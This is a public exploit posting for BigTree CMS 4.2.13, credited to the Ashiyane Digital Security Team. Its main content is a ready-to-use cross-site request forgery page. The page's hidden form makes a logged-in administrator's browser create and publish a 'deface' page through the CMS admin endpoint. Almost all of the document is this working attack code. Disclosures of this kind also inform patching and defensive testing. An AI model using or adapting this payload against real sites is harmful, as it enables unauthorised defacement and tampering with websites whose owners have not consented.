-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
-# Exploit Title : bigtree cms CSRF Exploit
-# Author : Ashiyane Digital Security Team
-# Vendor Homepage: https://www.bigtreecms.org/
-# Software Link:
-# https://www.bigtreecms.org/ajax/download-installer/?installer=53
-# Version : 4.2.13
-# Date: 26-10-2016
-# Tested On : Windows 7 / FireFox
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
<html>
<head>
<title>Add page CSRF Exploit</title>
</head>
<H2>Add page CSRF Exploi</H2>
  <body>
    <form action="http://localhost/admin/pages/create/" method="POST">
      <input type="hidden" name="_bigtree_post_check" value="success" />
      <input type="hidden" name="parent" value="0" />
      <input type="hidden" name="nav_title" value="deface" />
      <input type="hidden" name="title" value="deface page title" />
      <input type="hidden" name="in_nav" value="on" />
      <input type="hidden" name="template" value="content" />
      <input type="hidden" name="resources[page_header]" value="page header" />
      <input type="hidden" name="resources[page_content]" value="deface text" />
      <input type="submit" name="ptype" value="Create & Publish" />
    </form>
  </body>
</html>

-#-#  Path of page:  http://localhost/deface/

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-# Discovered by : Amir.ght                                          -#-#
#-# Author : Ashiyane Digital Security Team                  -#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#